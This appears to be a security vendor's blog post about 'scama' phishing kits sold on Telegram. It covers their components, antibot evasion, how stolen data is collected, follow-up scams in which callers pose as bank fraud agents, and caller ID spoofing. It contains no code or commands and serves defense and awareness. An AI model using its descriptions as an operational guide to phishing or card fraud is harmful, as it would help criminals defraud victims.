Scama: Uncovering the Dark Marketplace for Phishing Kits
Todd Stansfield with contributions from Vade analysts—
November 16, 2023—
4 min read
Earlier this month, Vade experts shared their predictions about the top email threats to dominate headlines in 2024. Among them was the continued rise of phishing-as-a-service (PhaaS), a malicious business model that sells sophisticated phishing kits—also referred to as scama, short for scamming method—to anyone willing to pay.
What is Scama?
Scama is a term used to refer to a phishing kit—a collection of malicious assets packaged and sold to hackers via platforms like Telegram. Phishing kits include everything cybercriminals need to launch a phishing campaign, which can include malicious email templates and web pages that impersonate legitimate brands and services.
Scama are sold in packs and include all the malicious assets hackers need to set up their own PhaaS platform. These packs are often primarily hosted on relatively well-known web hosting platforms and mainly in the Asia-Pacific (APAC) region. Unlike hosting solutions in Europe and other places, some countries in APAC don’t prioritize the regulation of data protection or international cooperation, including China and Indonesia. These locations offer hackers a favorable climate to conduct their nefarious activities.
Below are examples of scama packs for sale on public Telegram groups. They show that cybercriminals advertise their products and services like any other legitimate business, listing the features and benefits of their malicious offerings. These range from “anti-bot protection,” to “responsive” design, to proof of efficacy, and more.
French scama for Crit’Air
French scama for pension insurance
German bank scama
Netflix Dubai Scama
Among other assets, scama packs include a scampage (scam page or malicious webpage), mailer, and checker—all of which can be used via the web hosting solution. While scampages are designed to harvest victims’ sensitive information, mailers send phishing emails or SMS messages, and checkers verify that victim phone numbers or email addresses don’t appear on blacklists. These tools facilitate the phishing campaign from start to finish.
In some scama packs, hackers sell “SMS Spamming Slots” or “SMS Spamming Apps.” These tools serve as the mailer, and allow hackers to send large volumes of malicious SMS messages that can generate traffic to their scampages.
Ad for an SMS spamming tool
Because web hosting solutions provide webmail, they also allow hackers to set up an SMTP server. This makes them the ideal platform for hackers to use and manage malicious campaigns.
Most common or publicly available scama packs are already obsolete. Hackers continue to innovate and introduce new phishing kits that can evade detection and adapt to any location in the world. Unless you are already immersed in the groups and chats where new kits are announced, the ones that are easy to find online are likely already outdated. This underscores the need for an adaptable email security tool that can protect your users even when the threats are not readily identified.
How do scama attacks work?
Scama attacks begin with an initial contact, where the victim receives a phishing email or SMS message (also known as smishing). If the victim clicks or taps the malicious link included in the message, they get redirected to the scampage included in the scama pack.
Below is an example of an initial contact via a smishing text impersonating Netflix. The message urges the intended victim to update their membership via a malicious link that points to the domain “bedy13.com.”
Smishing text impersonating Netflix
For malicious campaigns such as these to be successful, the scampage must possess an antibot mechanism, a feature critically important to scammers.
In phishing kits, antibot mechanisms are designed to mimic human behavior and evade automated bot detection systems. They introduce random delays, mimic different user agents, simulate mouse movements, and click phishing pages. This makes it harder for security systems to differentiate between legitimate users and attackers, allowing the phishing attacks to proceed undetected.
Scampages also contain malicious fields to harvest the victim’s private information, such as their name, address, credit card number, or account credentials.
Once a victim enters information into the phishing page, it gets automatically transmitted to the attacker, who can retrieve it through a bot on Telegram, Discord or even an automated email service.
An example of a transmitted announcement from a Telegram group
After hackers gain access to the victim’s information, they can engage in a variety of nefarious activities, such as selling it on forums or Telegram groups. They can also carry out subsequent scams that are relatively new.
A recent scamming scheme involves calling a victim and impersonating an anti-fraud agent who represents a bank. The caller, following a script, alerts the victim that the bank has detected suspicious transactions on their account due to phishing. The fake anti-fraud agent asks the victim to verify sensitive information and claims to cancel the malicious transaction. Meanwhile, the caller often adds the victim’s credit card to an Apple Pay wallet or uses it to make online purchases.
Some scama packs offer this phone service, where an individual specialized in the scam makes the call for the hacker.
If the phone scam fails, hackers can easily use the credit card on websites that don’t require verification for transactions below a certain amount—often €500.
Scammers employ various techniques to conceal their phone numbers during scams, including Caller ID spoofing, VoIP services, anonymous SIM cards, and virtual numbers. They often record prerecorded calls and utilize international relay networks to obfuscate their location.
The nefarious relationship between scama buyers and sellers
While scama producers are incentivized to serve malicious customers, they’re also motivated to scam them. Scama sellers often attempt to exploit customers by embedding malicious code in their packs. Because of this common practice, tools like RezStealerFinder have emerged to protect hackers and enable them to secure their phishing pages.
RezStealerFinder detects malicious content in webpages, scanning for vulnerable, sometimes obfuscated code and unknown links that may be present in scama packs. The tool is effective at finding hidden code that a devious scama seller might use.
User-friendly and designed for hackers of various skill levels, RezStealerFinder is available for purchase on Telegram groups, as shown in the example below.
RezStealerFinder app for sale on Telegram
Scama: A thriving menace
While scama isn’t a new threat, its market continues to flourish. For a simple fee, anyone can use a scama pack and become a hacker capable of deploying a sophisticated attack. Scama has not only expanded the threat landscape by lowering the barriers to entry, but it has also made existing hackers more productive than before.
Scama is key reason phishing volumes have reached historic levels. In the first three quarters of 2023, Vade has detected more phishing emails than any annual total on record.
Phishing volumes detected by Vade from 2019-Q3 2023
To stay protected against scama threats, Vade encourages organizations to upgrade their email security and adopt phishing awareness training.